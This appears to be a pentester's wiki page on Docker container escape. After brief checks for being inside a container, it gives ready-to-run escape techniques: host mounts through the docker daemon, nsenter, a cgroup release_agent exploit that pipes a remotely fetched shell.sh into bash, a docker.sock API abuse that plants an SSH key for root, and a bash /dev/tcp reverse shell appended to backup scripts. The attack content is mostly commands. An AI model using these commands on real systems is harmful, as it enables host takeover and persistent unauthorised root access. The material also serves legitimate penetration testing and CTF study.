docker container escape

Previousdocker pentesting NextDocker CVE's

Last updated 11 months ago

Was this helpful?

docker container escape

Theory

Docker is an open-source containerization platform used for developing, deploying, and managing applications in lightweight virtualized environments called containers.

Practical (Exploitation)

Checking if we're in Container

List running processes

ps aux

If there are few no. of process is running then you might be in docker.

Look for docker.env file

cd / && ls -lah

If you see .dockerenv in base dir, then you’re in a container.

Those pesky cgroups

Navigating to “/proc/1” and then catting the “cgroups” file (cat cgroup).

Use following code to Verify you are in Docker

if [ -f /.dockerenv ]; then
 echo "I'm inside matrix ;(";
else
 echo "I'm living in real world!";
fi

Docker Escaping Techniques

1. Escape via Exposed Docker Daemon

Run the following cmd

If we’re in bash

docker run -v /:/mnt --rm -it bash chroot /mnt sh

If we’re in alpine

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

You can see the images repo

docker images
docker run -it -v /:/host/ ubuntu:18.04 chroot /host/ bash

NOTE: ubuntu:18.04 is the image repo

2. Shared Namespaces

By using ps aux you can view the process with processID see pid 1 is running root it is the first one that executed when the system is booted.

Exploiting it with nsenter

nsenter --target 1 --mount sh

3. Escape By Mounting File System

lsblk
mount /dev/sda2 /mnt
cd /mnt/root

NOTE: In this case sda2 is the dir we mount. Might be different in your case

4. Misconfigured Privileges

list out all the capabilities

capsh --print
capsh --print | grep sys_admin

If we get sys_admin capability, means the system is vuln.

On attacker VM:

First make a shell.sh and set python server and set listner.

On target machine:

d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
mkdir -p $d/w;echo 1 >$d/w/notify_on_release
t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo $t/c >$d/release_agent;printf '#!/bin/sh\ncurl 10.10.x.x:80/shell.sh | bash' >/c;
chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";

5. Exploitation of docker.sock in /var/run or /run if you're ROOT

STEP1: Listing the images of the container of the host

./curl -s --unix-socket /var/run/docker.sock http://localhost/images/json

STEP2: Now generate id_rsa in your machine

ssh-keygen -t rsa
cat key.pub

STEP3: Creating a new docker container with image ID

./curl -X POST -H "Content-Type: application/json" --unix-socket /var/run/docker.sock http://localhost/containers/create -d '{"Detach":true,"AttachStdin":false,"AttachStdout":true,"AttachStderr":true,"Tty":false,"Image":"c3:latest","HostConfig":{"Binds": ["/:/var/tmp"]},"Cmd":["sh", "-c", "echo ssh-rsa AAAA..............xfoS+Yb2cW4y9cKcBWpVIiNMEtMX7sIB/0cKl8W/mY4u1UeRzWOoIIew6hqlaWCW6WKeSiCrNzEEj.........................P0/BMcKBS2pzqct2rTQ/LfFFM= root@kali >> /var/tmp/root/.ssh/authorized_keys"]}'

NOTE: replace “c3:latest” with the docker image name that you’ll get from step1. eg: “RepoTags”:[“c3:latest”]

Now you’ll see you created a docker and get the id. eg: {“Id”:”c19a25c6cc7245030bf9741d300f632cc7f1e5f12adad238edce23d387ba00c2”,”Warnings”:[]}

STEP4: Now we gonna use the id and start the docker

./curl -X POST -H "Content-Type:application/json" --unix-socket /var/run/docker.sock http://localhost/containers/c19a25c6cc7245030bf9741d300f632cc7f1e5f12adad238edce23d387ba00c2/start

STEP5: Login SSH via your private key as user root and now you’re root

ssh -i key root@10.10.x.x

6. Debugfs

### debugfs (Interactive File System Debugger)
debugfs /dev/sda1

3. Writeable Backup Scripts

If we can find any writable backup scripts in a docker instance then we can add our own reverse shell into it.

echo "/bin/bash -c 'bash -i >& /dev/tcp/10.17.6.228/4444 0>&1'" >> backup.sh

Run a netcat listener

nc -nlvp 4444

After the script executes you should get a root shell on the real machine.

REFERENCES